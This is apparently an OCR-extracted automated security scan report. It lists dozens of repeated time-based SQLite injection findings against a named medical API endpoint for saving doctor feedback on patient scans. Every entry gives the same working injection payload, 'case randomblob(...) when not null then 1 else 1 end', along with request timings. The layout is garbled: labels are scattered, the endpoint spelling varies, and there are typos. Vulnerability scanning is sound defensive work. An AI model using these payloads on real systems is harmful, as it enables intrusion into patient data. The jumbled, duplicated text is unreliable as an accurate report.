> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [962] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,260] milliseconds, when the original unmodified query with value [827] took

[3,416] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [962] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,260] milliseconds, when the original unmodified query with value [827] took [3,416] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,039] milliseconds. parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,444] milliseconds, when the original unmodified query with

value [517] took [1,320] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,039] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,444] milliseconds, when the original unmodified query with

value [517] took [1,320] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,044] milliseconds,

Evidence

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,401] milliseconds, when the original unmodified guery with value [490] took [3,362] milliseconds.

Attack

Evidence

Info

Method

Evidence

Other Info

Method

Evidence

Other Info

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,044] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,401] milliseconds, when the original unmodified query with value [490] took [3,362] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,051] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, when the original unmodified query with

value [292] took [778] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,051] milliseconds. parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, when the original unmodified query with value [292] took [778] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,066] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,094] milliseconds, when the original unmodified query with

value [573] took [853] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,066] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,094] milliseconds, when the original unmodified query with value [573] took [853] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Evidence

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,080] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,717] milliseconds, when the original unmodified query with

value [339] took [1,352] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,080] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,717] milliseconds, when the original unmodified query with

value [339] took [1,352] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,100] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, when the original unmodified query with

value [300] took [1,142] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,100] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, when the original unmodified query with value [300] took [1,142] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,112] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence

caused the request to take [2,756] milliseconds, when the original unmodified query with

value [878] took [882] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,112] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,756] milliseconds, when the original unmodified query with

value [878] took [882] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,137] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,295] milliseconds, when the original unmodified guery with

value [327] took [431] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,137] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,295] milliseconds, when the original unmodified query with

value [327] took [431] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,229] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,015] milliseconds, when the original unmodified query with

value [875] took [790] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,229] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,015] milliseconds, when the original unmodified query with

value [875] took [790] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,254] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,463] milliseconds, when the original unmodified query with

value [278] took [1,845] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,254] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

Info caused the request to take [4,463] milliseconds, when the original unmodified query with

value [278] took [1,845] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,259] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence

caused the request to take [2,593] milliseconds, when the original unmodified query with

value [287] took [1,408] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,259] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,593] milliseconds, when the original unmodified query with

value [287] took [1,408] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Other

Evidence

Other

Other

Evidence

Other

Info

Info

Info

Info

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,268] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,214] milliseconds, when the original unmodified query with

value [292] took [882] milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,268] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,214] milliseconds, when the original unmodified query with

value [292] took [882] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,274] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,496] milliseconds, when the original unmodified query with

value [209] took [771] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,274] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,496] milliseconds, when the original unmodified query with

value [209] took [771] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,281] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,538] milliseconds, when the original unmodified query with

value [810] took [2,275] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,281] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,538] milliseconds, when the original unmodified query with

value [810] took [2,275] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,282] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence

caused the request to take [4,553] milliseconds, when the original unmodified query with

value [822] took [2,159] milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,282] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,553] milliseconds, when the original unmodified query with

value [822] took [2,159] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,323] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,637] milliseconds, when the original unmodified query with

value [461] took [1,083] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,323] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,637] milliseconds, when the original unmodified query with

value [461] took [1,083] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,336] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

> caused the request to take [1,776] milliseconds, when the original unmodified query with value [517] took [2,697] milliseconds.

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,336] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

> caused the request to take [1,776] milliseconds, when the original unmodified query with

value [517] took [2,697] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,347] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

> caused the request to take [3,272] milliseconds, when the original unmodified query with

value [217] took [4,135] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,347] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,272] milliseconds, when the original unmodified query with

value [217] took [4,135] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(10000000) when not null then 1 else 1 end

Other Info

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Method

Attack

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,354] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,841] milliseconds, when the original unmodified query with value [824] took [1,408] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,354] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,841] milliseconds, when the original unmodified query with value [824] took [1,408] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,426] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,287] milliseconds, when the original unmodified query with value [314] took [255] milliseconds.

Other

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,426] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,287] milliseconds, when the original unmodified query with value [314] took [255] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,473] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,986] milliseconds, when the original unmodified query with value [212] took [773] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,473] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,986] milliseconds, when the original unmodified query with value [212] took [773] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,493] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,330] milliseconds, when the original unmodified query with

value [327] took [1,017] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,493] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,330] milliseconds, when the original unmodified query with value [327] took [1,017] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,528] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2.829] milliseconds, when the original unmodified guery with

value [241] took [786] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,528] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,829] milliseconds, when the original unmodified query with value [241] took [786] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,225] milliseconds, when the original unmodified query with

value [346] took [772] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,225] milliseconds, when the original unmodified query with value [346] took [772] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,546] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,754] milliseconds, when the original unmodified query with

value [684.7686274509804] took [2,404] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,546] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,754] milliseconds, when the original unmodified query with value [684.7686274509804] took [2,404] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,656] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,667] milliseconds, when the original unmodified query with

value [805] took [1,936] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,656] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,667] milliseconds, when the original unmodified query with

value [805] took [1,936] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,657] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,890] milliseconds, when the original unmodified query with

value [373] took [1,701] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

Other Info

Evidence

Evidence

Other

Info

URL

Evidence

Other Info

Other not null then 1 else 1 end], which caused the request to take [1,657] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end],

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,890] milliseconds, when the original unmodified query with

value [373] took [1,701] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Other

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,754] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,853] milliseconds, when the original unmodified query with

value [295] took [2,117] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,754] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,853] milliseconds, when the original unmodified query with

value [295] took [2,117] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,830] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,064] milliseconds, when the original unmodified query with

value [285] took [789] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,830] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,064] milliseconds, when the original unmodified query with

value [285] took [789] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,842] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,084] milliseconds, when the original unmodified query with

value [322] took [258] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,842] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,084] milliseconds, when the original unmodified query with

value [322] took [258] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,950] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,898] milliseconds, when the original unmodified query with

value [805] took [258] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,950] milliseconds,

Other

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Info

caused the request to take [2,898] milliseconds, when the original unmodified query with

value [805] took [258] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Evidence

Other

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,969] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,310] milliseconds, when the original unmodified query with

value [1443] took [3,983] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,969] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,310] milliseconds, when the original unmodified query with

value [1443] took [3,983] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,980] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence

caused the request to take [2,859] milliseconds, when the original unmodified query with

value [888] took [2,104] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,980] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,859] milliseconds, when the original unmodified query with

value [888] took [2,104] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,994] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,220] milliseconds, when the original unmodified query with

value [1325] took [1,276] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,994] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,220] milliseconds, when the original unmodified query with

value [1325] took [1,276] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,015] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,106] milliseconds, when the original unmodified query with

value [217] took [2,848] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,015] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,106] milliseconds, when the original unmodified query with

value [217] took [2,848] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

Method **POST** Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,054] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,034] milliseconds, when the original unmodified query with

value [485] took [1,279] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,054] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,034] milliseconds, when the original unmodified query with

value [485] took [1,279] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Evidence

Other

Evidence

Other

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,086] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,979] milliseconds, when the original unmodified query with

value [888] took [2,482] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,086] milliseconds.

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,979] milliseconds, when the original unmodified query with

value [888] took [2,482] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,105] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,982] milliseconds, when the original unmodified query with

value [205] took [1,304] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,105] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,982] milliseconds, when the original unmodified query with

value [205] took [1,304] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,114] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,731] milliseconds, when the original unmodified query with

value [466] took [2,972] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,114] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,731] milliseconds, when the original unmodified query with

value [466] took [2,972] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2.256] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,227] milliseconds, when the original unmodified query with value [212] took [789] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,256] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,227] milliseconds, when the original unmodified query with value [212] took [789] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,276] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [8,806] milliseconds, when the original unmodified guery with value [710] took [2,065] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,276] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [8,806] milliseconds, when the original unmodified query with value [710] took [2,065] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,308] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,139] milliseconds, when the original unmodified query with value [185] took [2,771] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,308] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,139] milliseconds, when the original unmodified query with value [185] took [2,771] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Other

Info

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,436] milliseconds. parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,097] milliseconds, when the original unmodified query with value [268] took [778] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,436] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,097] milliseconds, when the original unmodified query with value [268] took [778] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,590] milliseconds,

Evidence

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,116] milliseconds, when the original unmodified query with value [519] took [996] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,590] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,116] milliseconds, when the original unmodified query with value [519] took [996] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,735] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,647] milliseconds, when the original unmodified query with

value [207] took [255] milliseconds.

Other Info

